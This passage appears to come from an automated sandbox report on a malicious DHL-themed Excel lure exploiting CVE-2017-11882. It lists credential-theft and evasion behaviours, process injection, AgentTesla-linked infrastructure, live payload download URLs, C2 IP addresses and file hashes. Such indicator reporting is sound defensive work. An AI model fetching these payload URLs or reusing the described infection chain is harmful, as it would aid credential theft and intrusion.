208.95.112.1, 49165, 49168, 49171 TUT-ASUS United States 17->59 91 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 17->91 93 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 17->93 95 Tries to steal Mail credentials (via file / registry access) 17->95 97 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 17->97 file7 signatures8 process9 dnsIp10 43 91.92.254.14, 49162, 80 THEZONEBG Bulgaria 19->43 69 System process connects to network (likely due to code injection or exploit) 19->69 71 Suspicious powershell command line found 19->71 73 Wscript starts Powershell (via cmd or directly) 19->73 75 4 other signatures 19->75 23 powershell.exe 12 5 19->23         started        signatures11 process12 dnsIp13 45 91.92.254.194, 49163, 49167, 49170 THEZONEBG Bulgaria 23->45 77 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 23->77 79 Writes to foreign memory regions 23->79 81 Injects a PE file into a foreign processes 23->81 27 AddInProcess32.exe 23->27         started        31 AddInProcess32.exe 2 23->31         started        33 AddInProcess32.exe 2 23->33         started        35 3 other processes 23->35 signatures14 process15 dnsIp16 47 ip-api.com 27->47 83 Tries to steal Mail credentials (via file / registry access) 27->83 85 Tries to harvest and steal browser information (history, passwords, etc) 27->85 49 ip-api.com 31->49 51 ip-api.com 33->51 53 ip-api.com 35->53 55 ip-api.com 35->55 signatures17

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  DHL ESTADO DE CUENTA - 7664557687757.xlam.xlsx68%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
                  DHL ESTADO DE CUENTA - 7664557687757.xlam.xlsx52%VirustotalBrowse
                  DHL ESTADO DE CUENTA - 7664557687757.xlam.xlsx100%AviraEXP/CVE-2017-11882.Gen
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  ip-api.com0%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  https://account.dyn.com/0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  http://ip-api.com0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                  http://91.92.254.194/imge/new-image_v.jpg1%VirustotalBrowse
                  http://91.92.254.194/imge/new-image_v.jpg100%Avira URL Cloudmalware
                  http://198.46.178.144/madamwebbbbbbbas6444.txt100%Avira URL Cloudmalware
                  http://91.92.254.14/Users_API/negrocock/file_omquennq.l51.txtz0%Avira URL Cloudsafe
                  http://198.46.178.1440%Avira URL Cloudsafe
                  http://198.46.178.144/controlfiredatinloverforxlammfile.vbsj0%Avira URL Cloudsafe
                  http://91.92.254.194/imge/new-image_v.jpgOls;0%Avira URL Cloudsafe
                  http://198.46.178.144/controlfirebase65.txt100%Avira URL Cloudmalware
                  http://198.46.178.144/controlfiredatinloverforxlammfile.vbs0%Avira URL Cloudsafe
                  http://www.w3.0%Avira URL Cloudsafe
                  http://91.92.254.14/Users_API/negrocock/file_omquennq.l51.txt0%Avira URL Cloudsafe
                  http://198.46.178.1443%VirustotalBrowse
                  http://198.46.178.144/madamwebbbbbbbas6444.txt13%VirustotalBrowse
                  http://91.920%Avira URL Cloudsafe
                  http://198.46.178.144/controlfirebase65.txt18%VirustotalBrowse
                  http://91.92.254.1940%Avira URL Cloudsafe
                  http://91.92.254.137/imge/new-image_j.jpg0%Avira URL Cloudsafe
                  http://91.92.250%Avira URL Cloudsafe
                  http://91.92.20%Avira URL Cloudsafe
                  http://91.920%VirustotalBrowse
                  http://91.92.250%VirustotalBrowse
                  http://91.92.254.1944%VirustotalBrowse
                  http://91.92.254.137/imge/new-image_j.jpg1%VirustotalBrowse
                  http://91.92.20%VirustotalBrowse
                  http://91.92.254.137/imge/new-image_0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ip-api.com
                  208.95.112.1
                  truetrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://91.92.254.194/imge/new-image_v.jpgtrue
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  http://198.46.178.144/madamwebbbbbbbas6444.txttrue
                  • 13%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  http://198.46.178.144/controlfirebase65.txttrue
                  • 18%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  http://198.46.178.144/controlfiredatinloverforxlammfile.vbstrue
                  • Avira URL Cloud: safe
                  unknown
                  http://ip-api.com/line/?fields=hostingfalse
                  • URL Reputation: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.518863919.0000000003829000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://91.92.254.14/Users_API/negrocock/file_omquennq.l51.txtzwscript.exe, 00000005.00000002.523435713.000000000087A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523359546.000000000087A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523248042.0000000000879000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523117461.0000000000873000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523241437.0000000000875000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://198.46.178.144/controlfiredatinloverforxlammfile.vbsjEQNEDT32.EXE, 00000002.00000002.454675403.00000000034A0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://account.dyn.com/powershell.exe, 00000006.00000002.518863919.000000000411B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.479098901.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.616770593.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Licensepowershell.exe, 00000006.00000002.518863919.0000000003829000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000006.00000002.518863919.0000000003829000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://198.46.178.144powershell.exe, 00000006.00000002.520915129.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.517243140.0000000002B6F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 3%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://91.92.254.194/imge/new-image_v.jpgOls;powershell.exe, 00000006.00000002.517243140.0000000002940000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://www.w3.AddInProcess32.exe, 0000000A.00000002.485482053.0000000002289000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.492812954.00000000023E9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.504664614.00000000022B9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000D.00000002.516749164.0000000002109000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://91.92.254.14/Users_API/negrocock/file_omquennq.l51.txtwscript.exe, 00000005.00000002.523380515.0000000000147000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.523415610.0000000000840000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523260557.000000000083C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.523415610.0000000000837000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523316147.000000000083F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523303828.000000000084F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523334720.000000000083F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523267448.0000000000836000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523117461.0000000000865000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523297099.0000000000867000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523325540.0000000000837000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523278836.0000000000865000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.523422586.0000000000868000.00000004.00000020.00020000.00000000.sdmp, controlfiredatinloverforxlammfile.vbs.2.dr, controlfiredatinloverforxlammfile[1].vbs.2.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://91.92wscript.exe, 00000005.00000003.523031295.0000000002FF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.523460331.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523198937.00000000008E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.523432581.0000000000877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523117461.0000000000873000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523322277.0000000000877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523117461.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523241437.0000000000875000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523254421.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.520674323.0000000004FB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.517243140.0000000002940000.00000004.00000800.00020000.00000000.sdmptrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://91.92.254.194powershell.exe, 00000006.00000002.520915129.00000000062B1000.00000004.00000800.00020000.00000000.sdmptrue
                  • 4%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://91.92.254.137/imge/new-image_j.jpgpowershell.exe, 00000006.00000002.517243140.0000000002940000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/powershell.exe, 00000006.00000002.518863919.0000000003829000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.518863919.0000000003829000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://ip-api.comAddInProcess32.exe, 00000008.00000002.479192755.00000000024AD000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.479192755.0000000002490000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.479192755.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.485482053.000000000228B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.485482053.0000000002320000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.485482053.000000000233E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.492812954.000000000249E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.492812954.0000000002494000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.492812954.00000000023EB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.504664614.0000000002350000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.504664614.000000000236D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.504664614.00000000022BB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000D.00000002.516749164.00000000021BD000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000D.00000002.516749164.00000000021A0000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000D.00000002.516749164.000000000210B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.617260829.00000000022DD000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.617260829.000000000222C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.617260829.00000000022C0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://91.92.25powershell.exe, 00000006.00000002.520674323.0000000004FB0000.00000004.00000020.00020000.00000000.sdmptrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://91.92.2wscript.exe, 00000005.00000003.523270494.000000000087F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.520674323.0000000004FB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.517243140.0000000002940000.00000004.00000800.00020000.00000000.sdmptrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://91.92.254.137/imge/new-image_wscript.exe, 00000005.00000003.523031295.0000000002FF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523342115.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.523448884.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.523117461.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.517243140.0000000002940000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.517243140.0000000002801000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.479192755.0000000002490000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.479192755.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.485482053.000000000228B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.485482053.0000000002320000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.492812954.00000000023EB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.492812954.0000000002480000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.504664614.0000000002350000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.504664614.00000000022BB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000D.00000002.516749164.00000000021A0000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000D.00000002.516749164.000000000210B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.617260829.000000000222C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.617260829.00000000022C0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  208.95.112.1
                  ip-api.comUnited States
                  53334TUT-ASUStrue
                  198.46.178.144
                  unknownUnited States
                  36352AS-COLOCROSSINGUStrue
                  91.92.254.14
                  unknownBulgaria
                  34368THEZONEBGtrue
                  91.92.254.194
                  unknownBulgaria
                  34368THEZONEBGtrue
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1467966
                  Start date and time:2024-07-05 07:24:42 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 33s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:17
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:DHL ESTADO DE CUENTA - 7664557687757.xlam.xlsx
                  Detection:MAL
                  Classification:mal100.troj.spyw.expl.evad.winXLSX@20/8@7/4
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 95%
                  • Number of executed functions: 134
                  • Number of non-executed functions: 32
                  Cookbook Comments:
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  TimeTypeDescription
                  01:26:18API Interceptor42x Sleep call for process: EQNEDT32.EXE modified
                  01:26:20API Interceptor218x Sleep call for process: wscript.exe modified
                  01:26:21API Interceptor170x Sleep call for process: powershell.exe modified
                  01:26:27API Interceptor65x Sleep call for process: AddInProcess32.exe modified
                  InputOutput
                  URL: Office document Model: gpt-4o
                  ```json{  "riskscore": 0,  "reasons": "The provided screenshot is completely blank with no visible text, buttons, or links. Therefore, there is no evidence of any malicious content, sense of urgency, or impersonation of well-known brands. The document does not pose any phishing risk."}
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  208.95.112.1pirates.batGet hashmaliciousKematian StealerBrowse
                  • ip-api.com/json
                  pirates.batGet hashmaliciousKematian StealerBrowse
                  • ip-api.com/json
                  Nuevo orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  Ship Docs_CI PL HBL COO_.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  SOA Payment for June 30th.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  SecuriteInfo.com.Win32.MalwareX-gen.20684.5190.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  bL1WCnC18s.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  A1YOFV1abV.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  main.ps1Get hashmaliciousUnknownBrowse
                  • ip-api.com/json
                  main.ps1Get hashmaliciousUnknownBrowse
                  • ip-api.com/json
                  198.46.178.144Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 198.46.178.144/madamwebbbbbbbas6444.txt
                  Comprobante_786765456776780879878968.vbsGet hashmaliciousAgentTeslaBrowse
                  • 198.46.178.144/controlfirebase65.txt
                  wdm8Vapk4t.rtfGet hashmaliciousUnknownBrowse
                  • managermagnetcccccmango.duckdns.org/thursdayfile.gif
                  i0D2xjNcmh.rtfGet hashmaliciousAgentTeslaBrowse
                  • 198.46.178.144/baze644444444444444444444444.txt
                  Comprobante de pago_978989689.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 198.46.178.144/baze644444444444444444444444.txt
                  91.92.254.14Swift tract-20240506_120.xlsGet hashmaliciousRemcosBrowse
                  • 91.92.254.14/Users_API/syscore/file_uidvpgdd.pgo.txt
                  DHL Invoice 20240407.xlsGet hashmaliciousFormBookBrowse
                  • 91.92.254.14/Users_API/syscore/file_xh2v0qyb.bsf.txt
                  bodtfUNu8p.rtfGet hashmaliciousUnknownBrowse
                  • 91.92.254.14/Users_API/syscore/file_4445ouzl.x5n.txt
                  DHL_AWB 98776013276.xlsGet hashmaliciousFormBookBrowse
                  • 91.92.254.14/Users_API/syscore/file_ahstznsa.ob0.txt
                  457525.xlsGet hashmaliciousUnknownBrowse
                  • 91.92.254.14/Users_API/syscore/file_4445ouzl.x5n.txt
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  ip-api.compirates.batGet hashmaliciousKematian StealerBrowse
                  • 208.95.112.1
                  pirates.batGet hashmaliciousKematian StealerBrowse
                  • 208.95.112.1
                  Nuevo orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  Ship Docs_CI PL HBL COO_.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  SOA Payment for June 30th.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  SecuriteInfo.com.Win32.MalwareX-gen.20684.5190.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  bL1WCnC18s.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  A1YOFV1abV.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  main.ps1Get hashmaliciousUnknownBrowse
                  • 208.95.112.1
                  main.ps1Get hashmaliciousUnknownBrowse
                  • 208.95.112.1
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  THEZONEBGSwift tract-20240506_120.xlsGet hashmaliciousRemcosBrowse
                  • 91.92.254.194
                  Nuevo orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 91.92.254.194
                  odeme tarihleri.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  fechas de pago.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  fechas de pago.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  fechas de pago.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  fechas de pago.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  odeme tarihleri.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  Pod0SuHrkb.rtfGet hashmaliciousUnknownBrowse
                  • 91.92.254.29
                  Orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 91.92.254.132
                  AS-COLOCROSSINGUSDVycy79WuR.jsGet hashmaliciousAgentTeslaBrowse
                  • 192.210.215.11
                  E-INVOICE.xlsGet hashmaliciousUnknownBrowse
                  • 198.46.178.137
                  E-INVOICE.xlsGet hashmaliciousUnknownBrowse
                  • 198.46.178.137
                  Nuevo orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 192.3.216.148
                  Pod0SuHrkb.rtfGet hashmaliciousUnknownBrowse
                  • 198.46.178.139
                  Orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 192.3.64.135
                  orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 192.3.243.156
                  DHL Invoice 20240407.xlsGet hashmaliciousFormBookBrowse
                  • 23.95.235.16
                  McrflHf6vg.exeGet hashmaliciousWhiteSnake StealerBrowse
                  • 107.173.80.187
                  3521381fadca86cfc577e8aa81ecff5f3453102559bb7e86d903d9b87db1456c_dump.exeGet hashmaliciousRemcosBrowse
                  • 107.173.4.18
                  THEZONEBGSwift tract-20240506_120.xlsGet hashmaliciousRemcosBrowse
                  • 91.92.254.194
                  Nuevo orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 91.92.254.194
                  odeme tarihleri.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  fechas de pago.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  fechas de pago.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  fechas de pago.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  fechas de pago.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  odeme tarihleri.scr.exeGet hashmaliciousXenoRATBrowse
                  • 91.92.248.167
                  Pod0SuHrkb.rtfGet hashmaliciousUnknownBrowse
                  • 91.92.254.29
                  Orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 91.92.254.132
                  TUT-ASUSpirates.batGet hashmaliciousKematian StealerBrowse
                  • 208.95.112.1
                  pirates.batGet hashmaliciousKematian StealerBrowse
                  • 208.95.112.1
                  Nuevo orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  Ship Docs_CI PL HBL COO_.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  SOA Payment for June 30th.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  SecuriteInfo.com.Win32.MalwareX-gen.20684.5190.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  bL1WCnC18s.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  A1YOFV1abV.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.95.112.1
                  main.ps1Get hashmaliciousUnknownBrowse
                  • 208.95.112.1
                  main.ps1Get hashmaliciousUnknownBrowse
                  • 208.95.112.1
                  No context
                  No context
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4760
                  Entropy (8bit):4.834060479684549
                  Encrypted:false
                  SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                  MD5:838C1F472806CF4BA2A9EC49C27C2847
                  SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                  SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                  SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):0.34726597513537405
                  Encrypted:false
                  SSDEEP:3:Nlll:Nll
                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                  Malicious:false
                  Preview:@...e...........................................................
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):3494
                  Entropy (8bit):3.7190181088878305
                  Encrypted:false
                  SSDEEP:96:LzpIW+dzpVzpZFzpUZzpZW+lzp6IVIgIrZW+EIhzp8:RAnvhUbBf7y1rBpT8
                  MD5:38DD6D1373224906A977F8163BF40BFA
                  SHA1:DA69500680005A4ECFF8C92E06FD26241A031BF3
                  SHA-256:915064D4A1672291B6432FBE34BC32675D189E86163A6C7B0F4D38EF55FF3269
                  SHA-512:D6209902C5089265DB4CEA1749D11A3AABD88DEBDA71F0A3BCF002F6C6BA1B459DE0CCC005BEB27F4FC986CD5DFEE9D37A4F58034BE66AAC50DA992E51909B29
                  Malicious:true
